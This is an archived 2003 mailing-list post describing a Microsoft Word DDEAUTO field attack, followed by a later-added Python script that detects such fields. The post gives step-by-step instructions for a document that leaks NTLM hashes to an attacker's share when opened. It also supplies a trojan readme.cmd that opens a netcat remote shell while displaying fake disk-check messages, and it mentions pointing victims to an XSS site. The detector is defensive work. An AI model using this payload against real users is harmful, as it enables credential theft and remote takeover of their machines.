MS office hacks

From: me (deros68@yahoo.com)
Date: Wed Feb 19 2003 - 16:18:29 EST


All,

MS Office has some good hacks that can be worked into
a pen test. This particular one works best inside
your organization (no firewall between you and your
target). All it requires is that a user open or print
a Word doc that you created and sent to them - or you
placed somewhere they could open it, maybe on a
shared drive for example.

Open a new Word doc. Put some text in it. Place a
footer at the bottom (or you can also use the hidden
text field), place the cursor somewhere in the hidden
text or footer, and hit Ctrl-F9 (inserts a macro).

Place this text into the macro
[ddeauto progman
"\\\\ipaddress\\sharename\\readme.cmd"]
- not including the []

The extra \ is an escape character necessary to get
the real \ in the macro.

Save the doc

There are two opportunities to get the target machine:
1. NTLM hashes
2. your readme.cmd file

When the target opens/prints the doc - before any sort
of messages or warnings are given (see below why
there are no macro warnings given) - the target
machine will send its NT/W2K/XP credentials
(authentication) to the IP address shown above. Now -
if you are running SMBREAD (part of L0phtCrack) you
can get their NTLM hashes before they get any messages
of any sort!!! If they run NTLMv2 - no such good luck,
as they will send hashes that you cannot use. When
they are successfully authenticated to your share name
(use "everybody read" for permissions on the share)
they will be prompted for the "progman" program to
open the readme.cmd file on your IP address.
But - they will not see your IP address. Word will
pop up a small window with text like "The remote data
(readme.cmd) is not accessible. Do you want to start
the application progman?".

BTW - you could use a Samba machine running SMBREAD
and point the readme.cmd there. If you name your
Trojan file something like readme.cmd - they will
probably open it anyway. What you place into the
readme.cmd is your option, but I like to use netcat
with an open port like below. If they answer "yes" to
the pop-up mentioned above, then the file (readme.cmd)
will run using their current NT authority.

YMMV

file is readme.cmd
@echo off
echo Checking to see how fragmented your C drive is... please wait
start /min \\192.168.1.5\testie\nc -dLp 81 -e %comspec%
echo You have no disk fragmentation problems at this time - OK. Please close this window..
end of readme.cmd

MS has patches for Word 97 & Word 2000 - but as in the
article below they have problems. One problem is
that you can use DDE or DDEAUTO to run the hack - and
plain DDE is not trapped by the patch!!

If you want some more information, see this URL:
http://www.woodyswatch.com/office/archtemplate.asp?v7-n49

BTW - Woody's Office Watch is an excellent source of
information and humor regarding the MS Office
products.

I figured out the DDE & DDEAUTO before I saw the above
article. The macro warning is not triggered by the
DDE or DDEAUTO command until the patch is applied.
Also - DDE services & progman are default
services/programs that exist in NT, W2K & XP.

There are other hacks that you can do - such as
launching IE with no console attached, pointing to your
XSS site!!!

I have patched my Word 97 and am very careful about
opening Word docs from unknown sources! I have also
disabled DDE services. BTW, DDE & DDEAUTO can also
be used in Excel spreadsheets. I am not certain if MS
has patched them. All OLE programs may use DDE
services. PPT, Access, ????

Cheers

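A defender-side check for the field codes this post describes, added here as an example and not part of the original post: it scans extracted document text for DDE/DDEAUTO fields (the post notes plain DDE escapes the patch, so both keywords are covered) and reports a UNC topic, which is the credential-exposure path, and an executable target. The sample inputs are constructed; 192.0.2.5 is a documentation address, not a real host.

```python
import re
from dataclasses import dataclass
from typing import List

# A Word DDE/DDEAUTO field: keyword, an application name (quoted or bare),
# then a quoted topic. Field keywords are case-insensitive, so the
# lowercase "ddeauto" written in the post is matched as well.
FIELD_RE = re.compile(
    r'\b(DDEAUTO|DDE)\b\s+(?:"([^"]*)"|(\S+))\s+"([^"]*)"', re.IGNORECASE)
# A UNC path \\host\share... (checked after field-code escapes are resolved)
UNC_RE = re.compile(r'^\\\\([^\\]+)\\[^\\]+')
# Extensions the shell will execute if the user answers "yes" to the prompt
EXEC_EXT = (".cmd", ".bat", ".exe", ".com", ".vbs", ".js")

@dataclass
class DdeFinding:
    keyword: str      # "DDE" or "DDEAUTO"
    application: str  # e.g. "progman"
    topic: str        # topic argument with doubled backslashes resolved
    remote_host: str  # host part of a UNC topic, "" when the topic is local
    reasons: List[str]

def unescape_field_arg(arg: str) -> str:
    """In a field code a literal backslash is written as a doubled backslash."""
    return arg.replace("\\\\", "\\")

def find_dde_fields(text: str) -> List[DdeFinding]:
    """Return every DDE/DDEAUTO field found in extracted document text."""
    findings = []
    for m in FIELD_RE.finditer(text):
        keyword = m.group(1).upper()
        app = m.group(2) if m.group(2) is not None else m.group(3)
        topic = unescape_field_arg(m.group(4))
        reasons = [f"{keyword} field launches application '{app}'"]
        host = ""
        unc = UNC_RE.match(topic)
        if unc:
            host = unc.group(1)
            reasons.append(f"topic is a UNC path to {host}: opening the document "
                           "authenticates to that host (NTLM credential exposure)")
        if topic.lower().endswith(EXEC_EXT):
            reasons.append("topic names an executable file")
        findings.append(DdeFinding(keyword, app, topic, host, reasons))
    return findings

# Constructed samples: one field shaped like the post's, one benign document.
SAMPLE_MALICIOUS = r'Report. DDEAUTO progman "\\\\192.0.2.5\\share\\readme.cmd" end'
SAMPLE_BENIGN = r'Quarterly report PAGE 3 DATE \@ "MMMM d, yyyy"'

if __name__ == "__main__":
    for f in find_dde_fields(SAMPLE_MALICIOUS):
        print(f.keyword, f.application, f.topic, f.remote_host, *f.reasons, sep="\n  ")
```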



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT